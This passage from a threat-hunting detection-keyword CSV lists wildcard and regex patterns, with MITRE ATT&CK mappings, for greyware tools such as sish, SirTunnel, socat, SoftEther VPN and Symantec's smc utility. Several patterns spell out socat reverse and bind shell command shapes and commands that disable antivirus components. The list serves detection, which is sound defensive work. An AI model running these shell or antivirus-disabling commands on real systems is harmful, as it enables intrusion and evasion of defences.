TA0003","N/A","N/A","C2","https://github.com/anderspitman/SirTunnel","1","0","#filehash","N/A","10","10","1327","111","2024-03-24T20:15:50Z","2020-09-23T00:15:26Z" "*daps94/SirTunnel*",".{0,1000}daps94\/SirTunnel.{0,1000}","greyware_tool_keyword","SirTunnel","SirTunnel enables you to securely expose a webserver running on your computer to a public URL using 
HTTPS.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/anderspitman/SirTunnel","1","1","N/A","N/A","10","10","1327","111","2024-03-24T20:15:50Z","2020-09-23T00:15:26Z" "*http://127.0.0.1:2019/id/*",".{0,1000}http\:\/\/127\.0\.0\.1\:2019\/id\/.{0,1000}","greyware_tool_keyword","SirTunnel","SirTunnel enables you to securely expose a webserver running on your computer to a public URL using HTTPS.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/anderspitman/SirTunnel","1","1","N/A","N/A","10","10","1327","111","2024-03-24T20:15:50Z","2020-09-23T00:15:26Z" "*matiboy/SirTunnel*",".{0,1000}matiboy\/SirTunnel.{0,1000}","greyware_tool_keyword","SirTunnel","SirTunnel enables you to securely expose a webserver running on your computer to a public URL using HTTPS.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/anderspitman/SirTunnel","1","1","N/A","N/A","10","10","1327","111","2024-03-24T20:15:50Z","2020-09-23T00:15:26Z" "* sish -c date*",".{0,1000}\ssish\s\-c\sdate.{0,1000}","greyware_tool_keyword","sish","HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","N/A","N/A","10","10","3921","300","2024-08-30T03:09:46Z","2019-02-15T15:36:23Z" "*/_sish/console*",".{0,1000}\/_sish\/console.{0,1000}","greyware_tool_keyword","sish","HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","N/A","N/A","10","10","3921","300","2024-08-30T03:09:46Z","2019-02-15T15:36:23Z" "*/sish.git*",".{0,1000}\/sish\.git.{0,1000}","greyware_tool_keyword","sish","HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/antoniomika/sish","1","1","N/A","N/A","10","10","3921","300","2024-08-30T03:09:46Z","2019-02-15T15:36:23Z" "*/sish.log*",".{0,1000}\/sish\.log.{0,1000}","greyware_tool_keyword","sish","HTTP(S)/WS(S)/TCP 
Tunnels to localhost using only SSH.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","N/A","N/A","10","10","3921","300","2024-08-30T03:09:46Z","2019-02-15T15:36:23Z" "*/sish/cmd/*",".{0,1000}\/sish\/cmd\/.{0,1000}","greyware_tool_keyword","sish","HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","N/A","N/A","10","10","3921","300","2024-08-30T03:09:46Z","2019-02-15T15:36:23Z" "*\sish.log*",".{0,1000}\\sish\.log.{0,1000}","greyware_tool_keyword","sish","HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","N/A","N/A","10","10","3921","300","2024-08-30T03:09:46Z","2019-02-15T15:36:23Z" "*eb0d8e4273608c13b5957ac047f911442b3d55527e20097cd038e120f01df5ae*",".{0,1000}eb0d8e4273608c13b5957ac047f911442b3d55527e20097cd038e120f01df5ae.{0,1000}","greyware_tool_keyword","sish","HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","3921","300","2024-08-30T03:09:46Z","2019-02-15T15:36:23Z" "*http://*.ssi.sh*",".{0,1000}http\:\/\/.{0,1000}\.ssi\.sh.{0,1000}","greyware_tool_keyword","sish","HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/antoniomika/sish","1","1","N/A","N/A","10","10","3921","300","2024-08-30T03:09:46Z","2019-02-15T15:36:23Z" "*https://*.ssi.sh*",".{0,1000}https\:\/\/.{0,1000}\.ssi\.sh.{0,1000}","greyware_tool_keyword","sish","HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/antoniomika/sish","1","1","N/A","N/A","10","10","3921","300","2024-08-30T03:09:46Z","2019-02-15T15:36:23Z" "*sish -x*",".{0,1000}sish\s\-x.{0,1000}","greyware_tool_keyword","sish","HTTP(S)/WS(S)/TCP Tunnels to 
localhost using only SSH.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","N/A","N/A","10","10","3921","300","2024-08-30T03:09:46Z","2019-02-15T15:36:23Z" "*ssh -L * tuns.sh*",".{0,1000}ssh\s\-L\s.{0,1000}\stuns\.sh.{0,1000}","greyware_tool_keyword","sish","HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","N/A","N/A","10","10","3921","300","2024-08-30T03:09:46Z","2019-02-15T15:36:23Z" "*ssh -R * tuns.sh*",".{0,1000}ssh\s\-R\s.{0,1000}\stuns\.sh.{0,1000}","greyware_tool_keyword","sish","HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","N/A","N/A","10","10","3921","300","2024-08-30T03:09:46Z","2019-02-15T15:36:23Z" "*testing.ssi.sh*",".{0,1000}testing\.ssi\.sh.{0,1000}","greyware_tool_keyword","sish","HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/antoniomika/sish","1","1","N/A","N/A","10","10","3921","300","2024-08-30T03:09:46Z","2019-02-15T15:36:23Z" "*https://www.skymem.info/srch?q=*",".{0,1000}https\:\/\/www\.skymem\.info\/srch\?q\=.{0,1000}","greyware_tool_keyword","skymen.info","used by attackers to find information about a company's users","T1593 - T1596 - T1213","TA0009","N/A","N/A","Reconnaissance","https://www.skymem.info","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*https://slack.com/api/channels.create*",".{0,1000}https\:\/\/slack\.com\/api\/channels\.create.{0,1000}","greyware_tool_keyword","slack","API usage of slack - creating channel - abused by multiple C2","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/mthcht/Purpleteam/blob/main/Detection/Threat%20Hunting/generic/C2_abusing_API_services.md","0","1","N/A","/!\ very high risk of FP - hunting 
only","1","2","146","15","2024-08-30T08:50:53Z","2022-12-05T12:40:02Z" "*smc -disable -mem*",".{0,1000}smc\s\-disable\s\-mem.{0,1000}","greyware_tool_keyword","smc","Symantec Client Management Component or (smc.exe) is a command-line utility that can manage (enable - disable - export) different components of SEP","T1562 - T1089","TA0005","N/A","N/A","Defense Evasion","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Antivirus/Symantec%20Endpoint%20Protection#threat-actor-ops-taops","1","0","N/A","N/A","9","4","305","43","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z" "*smc -disable -ntp*",".{0,1000}smc\s\-disable\s\-ntp.{0,1000}","greyware_tool_keyword","smc","Symantec Client Management Component or (smc.exe) is a command-line utility that can manage (enable - disable - export) different components of SEP","T1562 - T1089","TA0005","N/A","N/A","Defense Evasion","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Antivirus/Symantec%20Endpoint%20Protection#threat-actor-ops-taops","1","0","N/A","N/A","9","4","305","43","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z" "*smc -disable -wss*",".{0,1000}smc\s\-disable\s\-wss.{0,1000}","greyware_tool_keyword","smc","Symantec Client Management Component or (smc.exe) is a command-line utility that can manage (enable - disable - export) different components of SEP","T1562 - T1089","TA0005","N/A","N/A","Defense Evasion","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Antivirus/Symantec%20Endpoint%20Protection#threat-actor-ops-taops","1","0","N/A","N/A","9","4","305","43","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z" "*smc -enable -gem*",".{0,1000}smc\s\-enable\s\-gem.{0,1000}","greyware_tool_keyword","smc","Symantec Client Management Component or (smc.exe) is a command-line utility that can manage (enable - disable - export) different components of SEP","T1562 - T1089","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Antivirus/Symantec%20Endpoint%20Protection#threat-actor-ops-taops","1","0","N/A","N/A","9","4","305","43","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z" "*smc.exe -disable -mem*",".{0,1000}smc\.exe\s\-disable\s\-mem.{0,1000}","greyware_tool_keyword","smc","Symantec Client Management Component or (smc.exe) is a command-line utility that can manage (enable - disable - export) different components of SEP","T1562 - T1089","TA0005","N/A","N/A","Defense Evasion","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Antivirus/Symantec%20Endpoint%20Protection#threat-actor-ops-taops","1","0","N/A","N/A","9","4","305","43","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z" "*smc.exe -disable -ntp*",".{0,1000}smc\.exe\s\-disable\s\-ntp.{0,1000}","greyware_tool_keyword","smc","Symantec Client Management Component or (smc.exe) is a command-line utility that can manage (enable - disable - export) different components of SEP","T1562 - T1089","TA0005","N/A","N/A","Defense Evasion","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Antivirus/Symantec%20Endpoint%20Protection#threat-actor-ops-taops","1","0","N/A","N/A","9","4","305","43","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z" "*smc.exe -disable -wss*",".{0,1000}smc\.exe\s\-disable\s\-wss.{0,1000}","greyware_tool_keyword","smc","Symantec Client Management Component or (smc.exe) is a command-line utility that can manage (enable - disable - export) different components of SEP","T1562 - T1089","TA0005","N/A","N/A","Defense Evasion","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Antivirus/Symantec%20Endpoint%20Protection#threat-actor-ops-taops","1","0","N/A","N/A","9","4","305","43","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z" "*smc.exe -enable -gem*",".{0,1000}smc\.exe\s\-enable\s\-gem.{0,1000}","greyware_tool_keyword","smc","Symantec Client Management Component or (smc.exe) is a command-line utility that can manage (enable - disable - 
export) different components of SEP","T1562 - T1089","TA0005","N/A","N/A","Defense Evasion","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Antivirus/Symantec%20Endpoint%20Protection#threat-actor-ops-taops","1","0","N/A","N/A","9","4","305","43","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z" "*install snmpcheck*",".{0,1000}install\ssnmpcheck.{0,1000}","greyware_tool_keyword","snmpcheck","automate the process of gathering information of any devices with SNMP protocol support. like snmpwalk - snmpcheck allows you to enumerate the SNMP devices and places the output in a very human readable friendly format. It could be useful for penetration testing or systems monitoring","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","http://www.nothink.org/codes/snmpcheck/index.php","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*snmp-check * -c public*",".{0,1000}snmp\-check\s.{0,1000}\s\-c\spublic.{0,1000}","greyware_tool_keyword","snmpcheck","automate the process of gathering information of any devices with SNMP protocol support. like snmpwalk - snmpcheck allows you to enumerate the SNMP devices and places the output in a very human readable friendly format. 
It could be useful for penetration testing or systems monitoring","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","http://www.nothink.org/codes/snmpcheck/index.php","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*snmpwalk -v1 -cpublic *",".{0,1000}snmpwalk\s\s\-v1\s\-cpublic\s.{0,1000}","greyware_tool_keyword","snmpwalk","allows you to enumerate the SNMP devices and places the output in a very human readable friendly format","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://wiki.debian.org/SNMP","1","0","N/A","greyware tool - risks of False positive !","5","10","N/A","N/A","N/A","N/A" "*snmpwalk * public *1.3.6.1.*",".{0,1000}snmpwalk\s.{0,1000}\spublic\s.{0,1000}1\.3\.6\.1\..{0,1000}","greyware_tool_keyword","snmpwalk","allows you to enumerate the SNMP devices and places the output in a very human readable friendly format","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://wiki.debian.org/SNMP","1","0","N/A","greyware tool - risks of False positive !","5","10","N/A","N/A","N/A","N/A" "*snmpwalk -c public -v1 *",".{0,1000}snmpwalk\s\-c\spublic\s\-v1\s.{0,1000}","greyware_tool_keyword","snmpwalk","allows you to enumerate the SNMP devices and places the output in a very human readable friendly format","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://wiki.debian.org/SNMP","1","0","N/A","greyware tool - risks of False positive !","5","10","N/A","N/A","N/A","N/A" "*socat exec:*",".{0,1000}socat\sexec\:.{0,1000}","greyware_tool_keyword","socat","Shell spawning socat usage ","T1059 - T1105 - T1046","TA0002 - TA0008 - TA0007","N/A","Scattered Spider*","C2","https://linuxfr.org/news/socat-un-outil-en-ligne-de-commande-pour-maitriser-vos-sockets","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*socat FILE:*tty*raw*echo=0 
TCP*:*",".{0,1000}socat\sFILE\:.{0,1000}tty.{0,1000}raw.{0,1000}echo\=0\sTCP.{0,1000}\:.{0,1000}","greyware_tool_keyword","socat","socat bind shell","T1071 - T1573","TA0002 - TA0011","N/A","Scattered Spider*","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*socat file:*tty*raw*echo=0 tcp-listen:*",".{0,1000}socat\sfile\:.{0,1000}tty.{0,1000}raw.{0,1000}echo\=0\stcp\-listen\:.{0,1000}","greyware_tool_keyword","socat","socat reverse shell","T1071 - T1573","TA0002 - TA0011","N/A","Scattered Spider*","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*socat http://0x0*",".{0,1000}socat\shttp\:\/\/0x0.{0,1000}","greyware_tool_keyword","socat","contains an IP address as part of a URL or network destination formatted in an unconventional but technically valid way (hexa - octal - binary)","T1027 - T1059.004 - T1132.002","TA0011 - TA0005 - TA0002","","","Defense Evasion","https://x.com/CraigHRowland/status/1821176342999921040","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*socat -lp * http://0x0*",".{0,1000}socat\s\-lp\s.{0,1000}\shttp\:\/\/0x0.{0,1000}","greyware_tool_keyword","socat","contains an IP address as part of a URL or network destination formatted in an unconventional but technically valid way (hexa - octal - binary)","T1027 - T1059.004 - T1132.002","TA0011 - TA0005 - TA0002","","","Defense Evasion","https://x.com/CraigHRowland/status/1821176342999921040","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*socat -O /tmp/*",".{0,1000}socat\s\-O\s\/tmp\/.{0,1000}","greyware_tool_keyword","socat","Shell spawning socat usage ","T1059 - T1105 - T1046","TA0002 - TA0008 - TA0007","N/A","Scattered Spider*","C2","https://linuxfr.org/news/socat-un-outil-en-ligne-de-commande-pour-maitriser-vos-sockets","1","0","N/A","greyware tool - 
risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*socat TCP4-LISTEN:* fork TCP4:*:*",".{0,1000}socat\sTCP4\-LISTEN\:.{0,1000}\sfork\sTCP4\:.{0,1000}\:.{0,1000}","greyware_tool_keyword","socat","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0011","N/A","Scattered Spider*","C2","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*socat tcp-connect*",".{0,1000}socat\stcp\-connect.{0,1000}","greyware_tool_keyword","socat","Shell spawning socat usage ","T1059 - T1105 - T1046","TA0002 - TA0008 - TA0007","N/A","Scattered Spider*","C2","https://linuxfr.org/news/socat-un-outil-en-ligne-de-commande-pour-maitriser-vos-sockets","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*socat tcp-connect:*:* exec:*bash -li**pty*stderr*setsid*sigint*sane*",".{0,1000}socat\stcp\-connect\:.{0,1000}\:.{0,1000}\sexec\:.{0,1000}bash\s\-li.{0,1000}.{0,1000}pty.{0,1000}stderr.{0,1000}setsid.{0,1000}sigint.{0,1000}sane.{0,1000}","greyware_tool_keyword","socat","socat reverse shell","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","Scattered Spider*","C2","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","N/A","greyware tool - risks of False positive !","N/A","10","59490","14395","2024-08-26T09:29:03Z","2016-10-18T07:29:07Z" "*socat tcp-connect:*:* exec:/bin/sh*",".{0,1000}socat\stcp\-connect\:.{0,1000}\:.{0,1000}\sexec\:\/bin\/sh.{0,1000}","greyware_tool_keyword","socat","socat reverse shell","T1071 - T1573","TA0002 - TA0011","N/A","Scattered Spider*","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*socat 
TCP-LISTEN:**reuseaddr*fork EXEC:/bin/sh*",".{0,1000}socat\sTCP\-LISTEN\:.{0,1000}.{0,1000}reuseaddr.{0,1000}fork\sEXEC\:\/bin\/sh.{0,1000}","greyware_tool_keyword","socat","socat bind shell","T1071 - T1573","TA0002 - TA0011","N/A","Scattered Spider*","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z" "*igahhbkcppaollcjeaaoapkijbnphfhb*",".{0,1000}igahhbkcppaollcjeaaoapkijbnphfhb.{0,1000}","greyware_tool_keyword","Social VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "* install softether5*",".{0,1000}\sinstall\ssoftether5.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "* SoftEtherVPN-*.tar.xz*",".{0,1000}\sSoftEtherVPN\-.{0,1000}\.tar\.xz.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*/libexec/softether/vpnserver/vpnserver*",".{0,1000}\/libexec\/softether\/vpnserver\/vpnserver.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by 
attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*/SoftEtherVPN-*.tar.xz*",".{0,1000}\/SoftEtherVPN\-.{0,1000}\.tar\.xz.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*/SoftEtherVPN.git*",".{0,1000}\/SoftEtherVPN\.git.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","abused https://asec.ahnlab.com/en/66843/","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*/SoftEtherVPN/releases/tag/*",".{0,1000}\/SoftEtherVPN\/releases\/tag\/.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*/softether-vpnclient-*.exe*",".{0,1000}\/softether\-vpnclient\-.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*/softether-vpnserver-*.deb*",".{0,1000}\/softether\-vpnserver\-.{0,1000}\.deb.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*/softether-vpnserver.service*",".{0,1000}\/softether\-vpnserver\.service.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*/softether-vpnserver_*.exe*",".{0,1000}\/softether\-vpnserver_.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","1","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*/usr/ports/security/softether5*",".{0,1000}\/usr\/ports\/security\/softether5.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" 
"*\AppData\Local\Temp\VPN_*\VPN_Lock.dat*",".{0,1000}\\AppData\\Local\\Temp\\VPN_.{0,1000}\\VPN_Lock\.dat.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*\appdata\local\temp\vpn_*\vpnsetup.exe*",".{0,1000}\\appdata\\local\\temp\\vpn_.{0,1000}\\vpnsetup\.exe.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*\AppData\Local\Temp\VPN_AECD\*",".{0,1000}\\AppData\\Local\\Temp\\VPN_AECD\\.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*\CurrentControlSet\Services\Neo_VPN*",".{0,1000}\\CurrentControlSet\\Services\\Neo_VPN.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" 
"*\CurrentControlSet\Services\SEVPNCLIENTDEV*",".{0,1000}\\CurrentControlSet\\Services\\SEVPNCLIENTDEV.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*\DriverDatabase\DeviceIds\NeoAdapter_VPN*",".{0,1000}\\DriverDatabase\\DeviceIds\\NeoAdapter_VPN.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*\Program Files (x86)\SoftEther VPN*",".{0,1000}\\Program\sFiles\s\(x86\)\\SoftEther\sVPN.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*\Program Files\SoftEther VPN*",".{0,1000}\\Program\sFiles\\SoftEther\sVPN.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*\Public\Desktop\SoftEther VPN *",".{0,1000}\\Public\\Desktop\\SoftEther\sVPN\s.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN 
software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*\SoftEther VPN *\client_log\client_20*.log*",".{0,1000}\\SoftEther\sVPN\s.{0,1000}\\client_log\\client_20.{0,1000}\.log.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - T1571","TA0001 - TA0002 - TA0003 - TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/SoftEtherVPN/SoftEtherVPN","1","0","N/A","N/A","8","10","11440","2564","2024-08-30T10:46:30Z","2014-01-02T12:40:57Z" "*\SoftEther VPN Client Developer Edition\*",".{0,1000}\\SoftEther\sVPN\sClient\sDeveloper\sEdition\\.{0,1000}","greyware_tool_keyword","SoftEtherVPN","Cross-platform multi-protocol VPN software abused by attackers","T1133 - T1210 - T1573 - T1219 - 